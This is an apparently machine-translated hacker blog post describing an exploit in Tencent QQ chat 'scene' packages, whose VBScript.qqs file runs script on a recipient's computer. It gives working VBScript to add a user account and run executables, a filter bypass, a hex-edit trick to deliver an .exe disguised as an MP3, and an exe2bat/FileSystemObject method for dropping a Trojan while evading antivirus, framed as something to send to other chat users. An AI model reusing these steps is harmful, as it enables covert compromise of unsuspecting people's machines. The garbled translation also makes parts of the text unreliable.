Ghost doll: I tested some of them successfully, some of them failed, and the reason is unknown. In the same version, some are successful, and some fail. For example, the same beta1, some failed, some succeeded, some failed, and some succeeded. Of course, you can modify the scripts in VBScript. qqs to achieve other purposes. Use Cases. I am too lazy to map it. Test it by yourself.
Source: crab's blog
Extract the three files to \ Tencent \ QQ \ imscene \ scene \
Use NotePad to open VBScript. qqs
The code at the bottom
And then send it to others in the scenario.
Download:Qq.rar
Related Materials(Source: Carved's blog)
Let's take a look at the specific process of QQ 0day. Maybe someone can make a breakthrough. I explained on my blog that I didn't install B, this QQ test, I never tested it with people outside, you said, I am a B. Again, when I wrote this on my blog, I said that I was still in the test and never said that I was using it. I kept stuck in the step of executing the file.
Test process:
At the beginning of the test and the instructor's test, the MS player was able to play SWF files. I wrote an article last month. I tested the QQ player but found that this vulnerability could not be triggered because the player was not played in ms. So later, the instructor seemed to have gone to test other things. I went on to test this QQ. I made a few packages during the test a few days ago, including the boxes and exe packages, there is a package that causes the QQ crash. This QQ vulnerability should be clear to everyone. Let me briefly talk about it.
The problem file is indeed in the QQ scenario, where there is an image file and VBScript. qqs, config. qqs, file. The specific role of each file is simply described as the background of the scenario. The content of the config. qqs file is:
<? XML version = "1.0" encoding = "gb2312"?> <Theme ver = "1" guid = "8b7a99e866cc454dbe2a7f6238ee8f20">
<Scene type = "1" backgroupcolor = "# ffffff" friendcaptioncolor = "# 0000ff" minecaptioncolor = "#000000" msgtextcolor = "#000000" systemrequestcolor = "#000000" systemresultcolor =" #000000 ">
<Normal>
<Sound loop = "true" sourcepath = "e000001.mp3"/>
</Normal>
<Action name = "Action 01" type = "1">
<Actiondata>
<Sound usenormalsound = "false" loop = "true" sourcepath = "e000001.mp3"/>
</Actiondata>
</Action>
</Scene>
</Theme>
Clear at a glance. VBScript. qqs is a script for events such as 'animation parameters, initializing Frame Animation Parameters, initializing the background image location, and re-arranging scenes when the scene window size is changed. The file name is known as a vbs script.
However, this vbs script is not parsed using vbs. dll under winds, but parsed using a vbs *. dll file under the QQ directory. What can vbs do? You know more about it than I do. vbs downloader, execute, and virus. Powerful functions. Adding users is easy. Here are a few vbs scripts. If you are still interested in this vulnerability, you can test it yourself,
Add User:
Dim objshell
Set objshell = wscript. Createobject ("wscript. Shell ")
Ireturn = objshell. Run ("Net user X/Add", 0, true)
Run dos exe:
Dim WS
Set Ws = wscript. Createobject ("wscript. Shell ")
Ireturn = ws. Run ("test.exe", 0, true)
Run gui exe:
Dim wsh
Dim JS1
JS1 = "t1est.exe"
Set wsh = wscript. Createobject ("wscript. Shell ")
Wsh. Run (JS1)
In addition, if you use vbs to download the file, remember to do not kill. Because the file was killed during the test, you will not be able to transfer any files. The following describes how to upload arbitrary files. This method is successful during the test, but it does not seem to be successful during the test today. Method.
This method was also found when studying SWF, because the creation scenario does not support adding SWF files. Later, I tried to find a solution. Create the QQ installation package and add music to it. The music is the file with the SWF suffix changed. After being added, it is regenerated into a package. And then use ue or other hexadecimal edits. Find the MP3 suffix and change it. There may be research in this place, that is, why the files generated by him must be in the imscene \ scene \ directory of QQ. If he can change his path here, it's okay to directly write it into the startup. I didn't test this, and I'm waiting for you to discover it. Again, it seems that TX has been blocked for the Arbitrary File Transfer vulnerability. It is not very clear. Maybe the test has been completed today. If you have any ideas or new ideas about this vulnerability, please follow the instructions and try it together.
------------------------------------------
2. Test + Exploitation
1. upload any file
When testing the SWF Trojan, you want to change the MP3 file directly to the SWF file so that the scenario player can be loaded directly. I didn't expect TX to be a player of my own. As for how to upload SWF (or upload any file ). I believe everyone is wondering that we should first go to the next QQ Scenario Editor (on the CD ). After installation, change the file to MP3 format. The QQ scene editor cannot identify other files. Set the background image of the QQ scene. Otherwise, the white background dialog is black. It seems wrong at first glance. Then, add an action and add music in the property settings, as shown in figure 1. Then add the music with the suffix changed. Then, use the 16-in-the-box Editor (Figure 2) to edit the eooooo1.mp3into e000001.exe. In the installation file config. qqs
<Normal>
<Sound loop = "true" sourcepath = "e000001.exe"/>
</Normal>
<Action name = "Action 01" type = "1">
<Actiondata>
<Sound usenormalsound = "false" loop = "false" sourcepath = "e000001.exe"/>
Change it accordingly (when you see this article, it is estimated that TX has been blocked)
2. Run the vbs script.
Friends who have worked on QQ should be familiar with these files, such as config. qqs, setup. ini, VBScript. qqs. If you are interested in the specific functions of several files, you can search for the relevant information on the Internet. Here we will only talk about the VBScript. qqs file. First, let's look at some code,
Code:
'Animation Parameters
Dim g_bloop (1)
Dim g_nmaxtime (1)
Dim g_nimageframecount (1, 0)
Dim g_bframeimageanimate (1, 0, 0)
Dim g_nframeimagetime (1, 0, 0)
Dim g_nframeimageleft (1, 0, 0)
Dim g_nframeimagetop (1, 0, 0)
............
Sub scene_oninit (CX, CY)
'Initialize Frame Animation Parameters
Initdata
G_ncuraction =-1
G_ncurtime = 0
............
'Initialize the background image location
Scene_onsize CX, Cy
End sub
Many of you should know how to use this item. Here is an animation parameter and initial parameter for QQ scenes. The role of the vbs script is most clearly described by the vbs Downloader. Here is a simple demonstration. The msgbox function has a warning box. Don't underestimate it. Handsome guys can make some sweet talk with me. You can make this dish to scare prawns. In the code -- figure 3. Next, add "msgbox" QQ 0day by: www.522.16.cn ", and send messages when chatting with others-Figure 4. The scenario is accepted by default, but the recipient will see that the transfer is in progress and can be canceled. The average person will not doubt that thing, TX thing. After the transfer is completed, it will be in the other party. And appears locally-figure 5.
3. Execution File
The execution file is acceptable. If you directly execute the vbs downloading, an error occurs and the wscript object cannot be found. The reason is that this vbs script is not parsed Using VBScript. dll in winds, but parsed using a VBScript. dll file in QQ's own directory. Jiajia has been tested successfully. The following is a simple example. Jiajia and I are talking about TX filtering out some dangerous characters and filtering out the output, like this Code:
Set objshell = wscript. Createobject ("wscript. Shell "),
An error is prompted when loading in the QQ scenario, changed:
Set objshell = Createobject ("wscript. Shell. After testing, it is found that "Createobject (" wscript. Shell "). Run" C: \ 1.exe", 0 "can be successfully written. With the upload of any file above, you can achieve good results. However, file transfer may greatly extend the time required for file transfer. Sometimes the other party's QQ will crash. Jiajia comes up with a good method, which is both kill-free and convenient. Everyone knows about exe2bat. First, Createobject ("scripting. FileSystemObject") is used to write the code after the transfer through FSO. opentextfile, ECHO to a file, and then run it with wscript. Shell. Specifically, the bat-to-exe tool turns the Trojan into bat, as shown in figure 6. Write the code to the file through FSO. I have packed the specific files and you will understand them at a glance. If you are still interested in this vulnerability, you can test it on your own, but it is estimated that the vulnerability has been blocked by Tx when you see this article. Here we will package several vbs scripts for research by interested parties. If you have any questions, go to my blog and check it out (www.522.16.cn). At last, I would like to thank my brothers, instructors, thirteen, and Jiajia who helped me in the test.